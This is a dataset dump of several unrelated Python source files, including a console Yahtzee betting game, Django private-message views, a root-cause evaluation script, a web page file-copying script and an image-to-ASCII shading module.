HttpResponse('thanks')\n","sub_path":"vision/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"345940018","text":"'''\nAuthor: Kris Spencer\nDate Created: 12/13/2015\nPurpose: \n\n\t A game of Yahtzee. The user tries to get a score of 180 to break even. The user has a\n\t chance to win some money back with a score as little as 160. Earning a bonus pays $3 each\n\t The user can double their money (excluding bonus) by scoring 210.\n'''\nfrom Die import Die\n\nclass Yahtzee:\n\n\t__player = None #The player object passed in. Holds player data\n\t__cup = None\t #The cup the dice are rolled in. Holds upto 5 dice\n\t__lowerScore = 0 #The score of the lower half of a Yahtzee sheet\n\t__upperScore = 0 #The score of the upper half of a Yahtzee sheet\n\t__bonusScore = 0 #The upper score bonus and Yahtzee bonuses added-up\n\t__winnings = 0 #The amount of money the player has won\n\t__yahtzeeIsZero = False #Part of the check that a player is allowed a bonus Yahtzee. Can't have a 0 on original Yahtzee\n\t__cardCats = ['1s', '2s', '3s', '4s', '5s', '6s', '3Kind', '4Kind', 'House', 'Sm Straight', 'Lg Straight', 'Yahtzee', 'Chance'] #The categories in which a player can score\n\t__cardScores = [-1, -2, -3, -4, -5, -6, -30, -40, 25, 30, 40, 50, -10] #The point values awarded to the categories. Numbers that are negative are calculated\n\n\t#The constructor. Takes in the player object and stores it for later use\n\tdef __init__(self, player):\n\n\t\tself.__player = player\n\t\tself.__fillCup()\n\n\t#The only public function in the program. This is called to run the game\n\tdef run(self):\n\n\t\tbadInput = True\n\t\tisNotValid = True\n\t\tanswer = None\n\n\t\t#Checks to see if Yahtzee has been recycled. 
Yahtzee needs to be built as a new object to reset!\n\t\tif not self.__canStillScore():\n\n\t\t\tprint(\"Error: Yahtzee has not been reset!\")\n\t\t\treturn\n\n\t\tself.__printGameHeader()\n\t\t\n\t\t#Print the instructions if the user desires to see them\n\t\twhile badInput:\n\n\t\t\tanswer = input(\"Do you want to see the instructions? \")\n\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tbadInput = False\n\n\t\t\t\tif answer == 'yes' or answer == 'Yes':\n\n\t\t\t\t\tself.__printGameRules()\n\n\t\t#Reset for later use\n\t\tbadInput = True\n\n\t\t#Check and see if the user has the money to play. If not, return to main menu\t\t\n\t\tif not self.__userHasMoney():\n\n\t\t\treturn\n\n\t\t#Check to see if any categories are still open to score\n\t\twhile self.__canStillScore():\n\n\t\t\twhile badInput:\n\n\t\t\t\tanswer = input(\"Do you want to roll or quit? \")\n\n\t\t\t\tif answer == 'roll' or answer == 'Roll' or answer == 'quit' or answer == 'Quit':\n\n\t\t\t\t\tbadInput = False\n\n\t\t\t\t\tif answer == 'quit' or answer == 'Quit':\n\n\t\t\t\t\t\tprint(\"\\nYou've choosen to quit the game. Winnings = $0. Bye-bye\")\n\t\t\t\t\t\treturn\n\n\t\t\t#Reset for later use\n\t\t\tbadInput = True\n\n\t\t\troll = self.__rollCup()\n\t\t\tself.__printRoll(roll)\n\t\t\n\t\t\t#Start loop for alloted re-rolls. 
You get 2 chances to re-roll any dice of your choosing\n\t\t\tfor i in range(0, 2):\n\n\t\t\t\t#Get the die numbers the player wants to keep and not re-roll\n\t\t\t\tkeepSet = self.__getKeepSet()\n\t\t\t\t\n\t\t\t\t#If all 5 are wanted, then break the loop as the player doesn't want to roll any of them\n\t\t\t\tif len(keepSet) != 5:\n\n\t\t\t\t\troll = self.__keep(roll, keepSet)\n\t\t\t\t\troll += self.__rollCup(5 - len(roll))\n\t\t\t\t\troll.sort()\n\t\t\t\t\tself.__printRoll(roll)\n\n\t\t\t\telse:\n\n\t\t\t\t\tbreak\n\n\t\t\t#Makes the check if a bonus Yahtzee is to be rewarded\n\t\t\tif self.__isYahtzee(roll):\n\n\t\t\t\tself.__addBonusYahtzee()\n\n\t\t\t#Prints the categories in which the player can score. Doesn't show already scored categories\n\t\t\tprint('\\n')\n\t\t\tself.__printCats()\n\n\t\t\t#Set the score\n\t\t\twhile isNotValid:\n\n\t\t\t\tscoreCat = input(\"Enter on which to score: \")\n\t\t\t\tisNotValid = not self.__trySetScore(scoreCat, roll)\n\n\t\t\tisNotValid = True\n\n\t\t#After all categories are filled, check to see if the upper bonus applies and end the game\n\t\tself.__upperBonus()\n\t\tself.__endOfGame()\n\n\t#Checks for an open category\n\tdef __canStillScore(self):\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat != 'X':\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Print the game header\n\tdef __printGameHeader(self):\n\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Welcome to Yahtzee! ***\")\n\t\tprint(\"*** Get as close to 180 points as you can ***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t#Print the rules\n\tdef __printGameRules(self):\n\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Roll the 5 dice and try to score in one of the following categories: ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** 1s: Add-up the 1's in the roll. 
Max: 5 ***\")\n\t\tprint(\"*** 2s: Add-up the 2's in the roll. Max: 10 ***\")\n\t\tprint(\"*** 3s: Add-up the 3's in the roll. Max: 15 ***\")\n\t\tprint(\"*** 4s: Add-up the 4's in the roll. Max: 20 ***\")\n\t\tprint(\"*** 5s: Add-up the 5's in the roll. Max: 25 ***\")\n\t\tprint(\"*** 6s: Add-up the 6's in the roll. Max: 30 ***\")\n\t\tprint(\"*** 3Kind: Roll has at least 3 of the same number. Max: 30 ***\")\n\t\tprint(\"*** 4Kind: Roll has at least 4 of the same number. Max: 30 ***\")\n\t\tprint(\"*** House: A 2 of a kind + a 3 of a kind. Set points: 25 ***\")\n\t\tprint(\"*** Sm Straight: 4 numbers in sequence. Set points: 30 ***\")\n\t\tprint(\"*** Lg Straight: 5 numbers in sequence. Set points: 40 ***\")\n\t\tprint(\"*** Yahtzee: A 5 of a kind. Set points: 50 ***\")\n\t\tprint(\"*** Chance: Add all dice values for score. Max: 30 ***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t\tinput(\"Press enter to continue\")\n\n\t\tprint('\\n')\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Additional rules: ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** If you can't score in any categories left, you may put-down a 0. ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** Bonuses can be scored in the two following ways: ***\")\n\t\tprint(\"*** If a Yahtzee is scored (not a 0), extra Yahtzees are 100 points each.***\")\n\t\tprint(\"*** If the 1s - 6s all add-up to be more than 63 points, 35 are awarded. 
***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t#Format the roll in a more understandible way\n\tdef __printRoll(self, roll):\n\n\t\tprint('\\n')\n\t\tprint(' 1 2 3 4 5')\n\n\t\tfor die in roll:\n\n\t\t\tprint('[', end = '')\n\t\t\tprint(die, end = '] ')\n\n\t\tprint('\\n')\n\n\t#Calculate the winnings and display them\n\tdef __endOfGame(self):\n\n\t\ttotal = self.__upperScore + self.__lowerScore + self.__bonusScore\n\n\t\tif total > 210:\n\n\t\t\tself.__winnings += 40\n\n\t\telif total > 200:\n\n\t\t\tself.__winnings += 30\n\n\t\telif total > 190:\n\n\t\t\tself.__winnings += 25\n\n\t\telif total > 180:\n\n\t\t\tself.__winnings += 20\n\n\t\telif total > 170:\n\n\t\t\tself.__winnings += 10\n\n\t\telif total > 160:\n\n\t\t\tself.__winnings += 5\n\n\t\tprint(\"\\n\", end='')\n\t\tprint(self.__player.getName(), end = \" \")\n\t\tprint(\"has won: $\", end=\"\")\n\t\tprint(self.__winnings)\n\t\tprint(\"The score was \", end=\"\")\n\t\tprint(total)\n\t\tself.__player.addToWallet(total)\n\t\tprint(\"\\nThanks for playing!\")\n\n\t#Checks to see if a bonus is deserved and applies it\n\tdef __addBonusYahtzee(self):\n\n\t\tisBonus = True\n\n\t\t#Checks to see if the first Yahtzee has been scored\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat == 'Yahtzee':\n\n\t\t\t\tisBonus = False\n\n\t\t#Checks that the first Yahtzee wasn't scored as a 0. If everything is good, adds to bonus score\n\t\tif isBonus:\n\n\t\t\tif not self.__yahtzeeIsZero:\n\n\t\t\t\tprint(\"\\nBonus Yahtzee Scored!!!\")\n\t\t\t\tself.__bonusScore += 100\n\t\t\t\tself.__winnings += 3\n\n\t\t\telse:\n\n\t\t\t\tprint(\"\\nBonus not scored: A 0 was recored for original Yahtzee\")\n\n\t#Check that the user has the money to play. Ask them if they want to pay to play\n\tdef __userHasMoney(self):\n\n\t\tanswer = None\n\n\t\twhile True:\n\n\t\t\tanswer = input(\"Do you want to play for $20? 
\")\n\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tif answer == 'no' or answer == 'No':\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Goodbye\")\n\t\t\t\t\treturn False\n\n\t\t\t\tif self.__player.getCurrentWallet() < 20:\n\n\t\t\t\t\tprint(\"Not enough money, sorry\")\n\t\t\t\t\treturn False\n\n\t\t\t\telse:\n\n\t\t\t\t\tself.__player.subFromWallet(20)\n\n\t\t\t\treturn True\n\n\t#Checks if the upper bonus is to be awarded\n\tdef __upperBonus(self):\n\n\t\tif self.__upperScore >= 63:\n\n\t\t\tself.__bonusScore += 35\n\t\t\tself.__winnings += 3\n\n\t#Print-out the scorable categories. Skips ones that have been used already\n\tdef __printCats(self):\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat != 'X':\n\n\t\t\t\tprint(cat, end=\" \")\n\n\t\tprint('\\n')\n\n\t#The user is about to put a 0 down. Confirms this is what they want to do\n\tdef __zeroIsOkay(self):\n\n\t\tanswer = None\n\n\t\twhile True:\n\n\t\t\tanswer = input(\"The score will result in a 0. 
Is this okay?: \")\n\t\t\t\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tbreak\n\n\t\tif answer == 'yes' or answer == 'Yes':\n\n\t\t\treturn True\n\n\t\treturn False\n\n\t#Checks if the roll is a 3 of a kind\n\tdef __is3Kind(self, roll):\n\n\t\tcount = [0,0,0,0,0,0]\n\n\t\tfor die in roll:\n\n\t\t\tcount[die - 1] += 1\n\n\t\tfor i in count:\n\n\t\t\tif i >= 3:\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Checks if the roll is a 4 of a kind\n\tdef __is4Kind(self, roll):\n\n\t\tcount = [0,0,0,0,0,0]\n\n\t\tfor die in roll:\n\n\t\t\tcount[die - 1] += 1\n\n\t\tfor i in count:\n\n\t\t\tif i >= 4:\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Checks if the roll is a full house\n\tdef __isHouse(self, roll):\n\n\t\tfstNum = 0\n\t\tsndNum = 0\n\n\t\tfstNum = roll[0]\n\n\t\tfor i in range(1, len(roll)):\n\n\t\t\tif roll[i] != fstNum and sndNum == 0:\n\n\t\t\t\tsndNum = roll[i]\n\n\t\t\telif roll[i] != fstNum and roll[i] != sndNum:\n\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a small straight\n\tdef __isSmStraight(self, roll):\n\n\t\ttest = roll[0]\n\n\t\tif roll[1] == test + 1:\n\n\t\t\tfor i in range(0, len(roll) - 1):\n\n\t\t\t\tif roll[i] == test:\n\n\t\t\t\t\ttest += 1\n\n\t\t\t\telse:\n\n\t\t\t\t\treturn False\n\n\t\telse:\n\n\t\t\tfor i in range(1, len(roll)):\n\n\t\t\t\tif roll[i] == test:\n\n\t\t\t\t\ttest += 1\n\n\t\t\t\telse:\n\n\t\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a large straight\n\tdef __isLgStraight(self, roll):\n\n\t\ttest = roll[0]\n\n\t\tfor die in roll:\n\n\t\t\tif die == test:\n\n\t\t\t\ttest += 1\n\n\t\t\telse:\n\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t#Checks if the roll is a Yahtzee\n\tdef __isYahtzee(self, roll):\n\n\t\ttotal = self.__numCount(roll[0], roll)\n\n\t\tif total == 5:\n\n\t\t\treturn True\n\n\t\treturn False\n\n\t#This function tries to set the score of the category the user has selected. 
\n\t#It checks to see if it's available, if it exists and if the roll matches the rules for it\n\tdef __trySetScore(self, catName, roll):\n\n\t\tisSet = False\n\t\tisYahtzee = False\n\t\tpoints = 0\n\n\t\t#Check availibility of the category wanted\n\t\tisSet = self.__checkCardAvail(catName)\n\n\t\tif not isSet:\n\n\t\t\treturn isSet\n\n\t\t#Finds the category and scores it based on rules. Many categories are calculated (Have a negative number)\n\t\t#Also does the if 0 is okay check\n\t\tfor i in range(0, len(self.__cardCats)):\n\n\t\t\tif self.__cardCats[i] == catName:\n\n\t\t\t\tif self.__cardScores[i] == -1:\n\n\t\t\t\t\tpoints = self.__numTotaler(-1, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -2:\n\n\t\t\t\t\tpoints = self.__numTotaler(-2, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -3:\n\n\t\t\t\t\tpoints = self.__numTotaler(-3, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -4:\n\n\t\t\t\t\tpoints = self.__numTotaler(-4, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -5:\n\n\t\t\t\t\tpoints = self.__numTotaler(-5, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == -6:\n\n\t\t\t\t\tpoints = self.__numTotaler(-6, roll)\n\n\t\t\t\t\tif points == 0:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__upperScore += points\n\n\t\t\t\telif self.__cardScores[i] == 
-30:\n\n\t\t\t\t\tpoints = self.__totalDice(roll)\n\n\t\t\t\t\tif not self.__is3Kind(roll):\n\t\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += points\n\n\t\t\t\telif self.__cardScores[i] == -40:\n\n\t\t\t\t\tpoints = self.__totalDice(roll)\n\n\t\t\t\t\tif not self.__is4Kind(roll):\n\t\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += points\n\n\t\t\t\telif self.__cardScores[i] == -10:\n\n\t\t\t\t\tself.__lowerScore += self.__totalDice(roll)\n\n\t\t\t\t#Here the categories are not calculated, but have a set point value\n\t\t\t\telse:\n\n\t\t\t\t\tif catName == 'House':\n\n\t\t\t\t\t\tisSet = self.__isHouse(roll)\n\n\t\t\t\t\telif catName == 'Sm Straight':\n\n\t\t\t\t\t\tisSet = self.__isSmStraight(roll)\n\n\t\t\t\t\telif catName == 'Lg Straight':\n\n\t\t\t\t\t\tisSet = self.__isLgStraight(roll)\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tisSet = self.__isYahtzee(roll)\n\t\t\t\t\t\tisYahtzee = True\n\n\t\t\t\t\tif not isSet:\n\n\t\t\t\t\t\tisSet = self.__zeroIsOkay()\n\n\t\t\t\t\t\tif isSet:\n\n\t\t\t\t\t\t\tself.__yahtzeeIsZero = True\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tself.__lowerScore += self.__cardScores[i]\n\n\t\t\t\tif isSet:\n\n\t\t\t\t\tself.__cardCats[i] = 'X'\n\t\t\t\n\t\treturn isSet\n\n\t#Adds-up all the dice in the roll\n\tdef __totalDice(self, roll):\n\n\t\ttotal = 0\n\n\t\tfor die in roll:\n\n\t\t\ttotal += die\n\n\t\treturn total\n\n\t#Counts the number of occurences of a value. EX: How many dice have rolled a 6\n\tdef __numCount(self, num, roll):\n\n\t\ttotal = 0\n\n\t\tfor die in roll:\n\n\t\t\tif die == num:\n\n\t\t\t\ttotal += 1\n\n\t\treturn total\n\t\n\t#Adds-up all (num) values in the roll. 
EX: all 6's\n\tdef __numTotaler(self, num, roll):\n\n\t\ttotal = 0\n\n\t\tif num < 0:\n\n\t\t\tnum *= -1\n\n\t\tfor die in roll:\n\n\t\t\tif die == num:\n\n\t\t\t\ttotal += num\n\n\t\treturn total\n\n\t#Check if a category is availible to score\n\tdef __checkCardAvail(self, catName):\n\n\t\tisAvail = False\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat == catName:\n\n\t\t\t\tisAvail = True\n\n\t\treturn isAvail\n\n\t#Gets the die numbers the player wants to set aside and not re-roll\n\tdef __getKeepSet(self, numOfDice=5):\n\n\t\tbadInput = True\n\n\t\twhile badInput:\n\n\t\t\tkeepSet = input(\"Enter the numbers of the dice you want to keep: \")\n\t\t\tkeepSet = self.__parseKeep(keepSet)\n\n\t\t\tif keepSet[0] == -1 and len(keepSet) > 1:\n\n\t\t\t\tprint(\"If you didn't want to keep any (you entered 0)\", new=\"\")\n\t\t\t\tprint(\"why the multiple numbers? Enter just 0 please.\")\n\n\t\t\telif keepSet[0] == -1:\n\n\t\t\t\tbadInput = False\n\n\t\t\telse:\n\n\t\t\t\tif keepSet != 'Parse Error':\n\n\t\t\t\t\tbadInput = False\n\n\t\t\t\t\tfor index in keepSet:\n\n\t\t\t\t\t\tif index < 0 or index > (numOfDice - 1):\n\n\t\t\t\t\t\t\tprint(\"Error: Die numbers are 1 - \", end=\"\")\n\t\t\t\t\t\t\tprint(numOfDice)\n\t\t\t\t\t\t\tbadInput = True\n\n\t\t\t\telse:\n\n\t\t\t\t\tprint(\"Error: Enter the numbers of the dice you want to keep!\")\n\n\t\treturn keepSet\n\n\t#Rolls the cup by removing the appropriate number of dice from it (It starts filled with 5)\n\tdef __rollCup(self, numOfDice = 5):\n\n\t\troll = []\n\n\t\tself.__cup = self.__cup[:numOfDice]\n\n\t\tfor i in range(0, numOfDice):\n\n\n\t\t\troll.append(self.__cup[i].roll())\n\n\t\troll.sort()\n\t\tself.__fillCup();\n\n\t\treturn roll\n\n\t#Fills the cup with 5 dice\n\tdef __fillCup(self):\n\n\t\tself.__cup = [Die(), Die(), Die(), Die(), Die()]\n\n\t#To get the numbers of the dice the player wants to keep, the string is parsed. 
Spaces are allowed\n\tdef __parseKeep(self, keepList):\n\n\t\tdieIndeces = []\n\t\trepeats = 0\n\n\t\t#Extract the numbers and check that they are in range\n\t\tfor char in keepList:\n\n\t\t\ttry:\n\n\t\t\t\tdieIndeces.append(int(char) - 1)\n\n\t\t\t\tif dieIndeces[len(dieIndeces) - 1] < -1 or dieIndeces[len(dieIndeces) - 1] > 4:\n\n\t\t\t\t\traise ValueError('Number out of range')\n\n\t\t\texcept ValueError:\n\n\t\t\t\tif char != ' ':\n\n\t\t\t\t\treturn 'Parse Error'\n\t\tdieIndeces.sort()\n\n\t\t#Step one in removing repeats is to replace all repeats with a 10\n\t\tfor i in range(1, len(dieIndeces)):\n\n\t\t\tif dieIndeces[i] == dieIndeces[i - 1]:\n\n\t\t\t\tdieIndeces[i] = 10\n\t\t\t\trepeats += 1\n\n\t\tdieIndeces.sort()\n\n\t\t#For every repeat (for every 10), delete it. Yes, it doesn't look for 10's, why use 10's?\n\t\t#Sorting the list causes the 10's to be at the end always\n\t\tfor i in range(0, repeats):\n\n\t\t\tdel dieIndeces[len(dieIndeces) - 1]\n\n\t\treturn dieIndeces\n\n\t#Makes a list of the dice, out of the roll, the player wanted to keep\n\tdef __keep(self, diceSet, keepIndeces):\n\n\t\tdiceKept = []\n\n\t\tfor i in keepIndeces:\n\n\t\t\tdiceKept.append(diceSet[i])\n\n\t\treturn diceKept\n","sub_path":"Yahtzee.py","file_name":"Yahtzee.py","file_ext":"py","file_size_in_byte":16761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"283285393","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom users.models import Users \nfrom django.contrib.auth.models import User\nfrom privateMsg.models import *\n\n# Create your views here.\ndef test(request):\n\treturn HttpResponse('hello')\n\ndef createMsg(request):\n\tif request.is_ajax():\n\t\tmsg_title = request.GET['postsTitle']\n\t\tmsg_content = request.GET['postsContent']\n\t\tuserYNickname = request.GET['toUserNIckname']\n\n\t\tuserY = Users.objects.get(nickname=userYNickname)\n\t\tuser = request.user\n\t\tuserX = 
Users.objects.get(user=user)\n\n\t\txToy = XtoY.objects.get_or_create(userX=userX,userY=userY)[0]\n\t\t\n\t\tmsg = PrivateMsg(msg_title=msg_title,msg_content=msg_content,msg_status='new',xToy=xToy)\n\t\tmsg.save()\n\n\treturn HttpResponse('hello')\n\n#这个函数的功能应该是查出我与几个人聊天,然后每个人的新消息数目\ndef getAllMsgs(request):\n\tcontext = {}\n\t#1.先根据登录用户在Users表中查询该用户id\n\tusersMe = Users.objects.get(user=request.user)\n\t#2.然后根据该用户id在XtoY表中查找跟这个用户相关的聊天关系\n\txToys1 = XtoY.objects.filter(userX = usersMe)#我发给别人的消息\n\txToys2 = XtoY.objects.filter(userY = usersMe)#别人发给我的消息\n\tchatterCounts = len(xToys1) + len(xToys2)\n\n\t#3.接着根据聊天关系在私信表里查询相关连的私信\n\tnewMsgCounts = 0\n\tmsgCounts = 0\n\tfor xtoy1 in xToys1:\n\t\tpriMsgs1 = PrivateMsg.objects.filter(xToy = xtoy1)#我发给别人的消息\n\t\tfor pm in priMsgs1:\n\t\t\tmsgCounts += 1\n\t\t\tif pm.msg_status == 'new':\n\t\t\t\tnewMsgCounts += 1\n\t\t#统计每个人的新消息数目\n\t\tcontext[xtoy1.userY.nickname + '_mc'] = newMsgCounts\n\tfor xtoy2 in xToys2:\n\t\tpriMsgs2 = PrivateMsg.objects.filter(xToy = xtoy2)#别人发给我的消息\n\t\tfor pm in priMsgs2:\n\t\t\tmsgCounts += 1\n\t\t\tif pm.msg_status == 'new':\n\t\t\t\tnewMsgCounts += 1\n\t\t#统计每个人的新消息数目\n\t\tcontext[xtoy2.userX.nickname + '_mc'] = newMsgCounts\n\n\tprint('chatterCounts:' + str(chatterCounts) + ' msgCounts:' + str(msgCounts))\n\tcontext['chatterCounts'] = chatterCounts\n\tcontext['msgCounts'] = msgCounts\n\tcontext['newMsgCounts'] = newMsgCounts\n\n\n\tcontext['chatter_list1'] = xToys1\n\tcontext['chatter_list2'] = xToys2\n\tcontext['priMsg_list1'] = priMsgs1\n\tcontext['priMsg_list2'] = priMsgs2\n\treturn render(request,'chatList.html',context)\n\ndef getChatContent(request):\n\tcontext = {}\n\txToyId = request.GET['chatter']\n\txToy = XtoY.objects.get(id=xToyId)\n\tpriMsgs = PrivateMsg.objects.filter(xToy=xToy)\n\n\tcontext['priMsgs'] = priMsgs\n\treturn 
render(request,'primsg.html',context)","sub_path":"myforum/privateMsg/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506329674","text":"from iops_data_2019 import phase1\nfrom hotspot import evaluation\nfrom tqdm import tqdm\nimport ray\n\nSTRIDE = 288\nhist_time_period = 13\nreal_list = phase1.data_frame_list[13*288:]\nhist_list = phase1.data_frame_list[:13*288]\ninterval_len = 5 * 60\nM = 10\nPT = 0.9\nT_EEP = 0.2\nT_EP = 0.9\nwindow = 4\nstart_real_time = real_list[0].index[0]\nsimulate_time = 20\n\nray.init()\n\n\nif __name__ == \"__main__\":\n root_cause_1 = [{'i': 'i02'}, {'i': 'i04'}]\n root_cause_2 = [{'i': 'i02', 'e': 'e04'},\n {'i': 'i07', 'e': 'e06'},\n {'i': 'i08', 'e': 'e06'}]\n F_score_1 = F_score_2 = []\n rate = 0.6\n moment = 1536888000\n result = open(\"random_evaluation.txt\", 'w')\n result.write(\">> root cause 1 --- {} \\n\".format(root_cause_1))\n result.write(\">> root cause 2 --- {} \\n\".format(root_cause_2))\n for k in tqdm(range(simulate_time)):\n F_score_1.append(evaluation.evaluate(root_cause_1, rate, moment, real_list, \"adtributor_MCTS\"))\n F_score_2.append(evaluation.evaluate(root_cause_2, rate, moment, real_list, \"adtributor_MCTS\"))\n result.write(\">> simulation time: {} \\n\".format(k))\n result.write(\"root cause 1 F score: {} \\n\".format(F_score_1[k]))\n result.write(\"root cause 2 F score: {} \\n\".format(F_score_2[k]))\n result.close()\n","sub_path":"Code/hotspot/random_evaluation.py","file_name":"random_evaluation.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19257383","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport shutil\nfrom os.path import isfile, join\n# from subprocess import call\n\nfrom floo_powder.data_interaction import ref_process\nfrom 
floo_powder.html_process import add_js_files\nfrom floo_powder.js_selector_trans import selector_trans\nfrom floo_powder.js_extract import inside_js_extract\nfrom floo_powder.js_beautifier import beautify_tar_js\n\n# path = sys.argv[1]\n# tar = sys.argv[2]\n# ref = sys.argv[3]\n\npath = '/Users/4faramita/Desktop/webpage'\ntar = 'tar99'\nref = 'ref100'\n\npath_tar = path + os.sep + tar + os.sep\npath_ref = path + os.sep + ref + os.sep\ndb_name = tar + '_' + ref\n\n# Process all *.js in path_ref\nref_process(path_ref)\ninside_js_extract(path_tar + tar + '.htm')\n\n\n# copy whole dir with structure(with tweak)\ndef _copytree_tar(src: str, dst: str, symlinks=False, ignore=None):\n if not os.path.exists(dst):\n os.makedirs(dst)\n for item in os.listdir(src):\n src_file_path = os.path.join(src, item)\n dst_file_path = os.path.join(dst, item)\n if os.path.isdir(src_file_path):\n _copytree_tar(src_file_path, dst_file_path, symlinks, ignore)\n else:\n if (not os.path.exists(dst_file_path) or\n os.stat(src_file_path).st_mtime - os.stat(dst_file_path).st_mtime > 1):\n if src_file_path.endswith('.js'):\n try:\n shutil.copy2(src_file_path, path_ref + os.sep + 'tarJS' + os.sep)\n except FileNotFoundError:\n os.makedirs(path_ref + os.sep + 'tarJS' + os.sep)\n shutil.copy2(src_file_path, path_ref + os.sep + 'tarJS' + os.sep)\n elif not src_file_path.endswith('.css') and not src_file_path.endswith('.DS_Store'):\n shutil.copy2(src_file_path, dst_file_path)\n\n\n# copy everything except *.css and *.js in tar# into ref#\n# copy *.js into ref#/tarJS\n_copytree_tar(path_tar, path_ref)\n\n# call node to prettify all *.js files\n# call(['node', 'floo_powder' + os.sep + 'prettifier.js', path_ref + 'tarJS'])\n# I killed node! 
Let's use Python to beautify!\nbeautify_tar_js(path_ref + 'tarJS')\n\n# String to add to HTML files\njs_to_add = '\\n\\n'\n\njs_files = [f for f in os.listdir(path_ref + os.sep + 'tarJS' + os.sep)\n if isfile(join(path_ref + os.sep + 'tarJS' + os.sep, f))]\nfor js_file in js_files:\n status = selector_trans(\n path_ref + 'tarJS' + os.sep + js_file,\n db_name\n )\n\n if status:\n js_to_add = (js_to_add +\n '\\n')\n# print(js_to_add)\n\nadd_js_files(db_name, ref, path_ref + ref + '.htm', js_to_add)\n","sub_path":"floo_powder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"157143801","text":"from PIL import Image, ImageStat\nimport imageToBlock\n\ngrayScale = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\n\n# Returns the gray scale 1-70\n# Takes in: Small Img\n# Spits out: letter\ndef determineShade(img):\n # NOTE: 000 is Black, 255255255 is White\n # GrayScale[0] Darkest, GrayScale[70] Lightest\n sta = ImageStat.Stat(img)\n\n numAvg = findMean(sta.mean)\n return grayScale[findShade(numAvg)]\n\n\n# Find the mean of numbers in list\n# Takes in: list of num\n# Spits out: average\ndef findMean(lst):\n temp = 0\n for x in lst:\n temp += x\n\n return temp/len(lst)\n\n# Find the shade value\n# Takes in: average value\n# Spits out: Number between 0-69\ndef findShade(num):\n shade = int(num * (70 / 255)) - 1\n if shade < 0:\n shade = 0\n return shade\n\n# Use shade on all\n# Takes in: the list of images\n# Return: Tuple with (x, y, letter)\ndef allLetters(imgs):\n ltr = []\n for img in imgs:\n ltr.append((img[0], img[1], determineShade(img[2])))\n\n return ltr\n\n\n# Test \ndef determineShadeTest(img):\n sta = ImageStat.Stat(img)\n\n numAvg = findMean(sta.mean)\n return findShade(numAvg)\n\ndef allLettersTest(imgs):\n ltr = []\n allNum = []\n for img in imgs:\n if determineShadeTest(img[2]) not in allNum:\n 
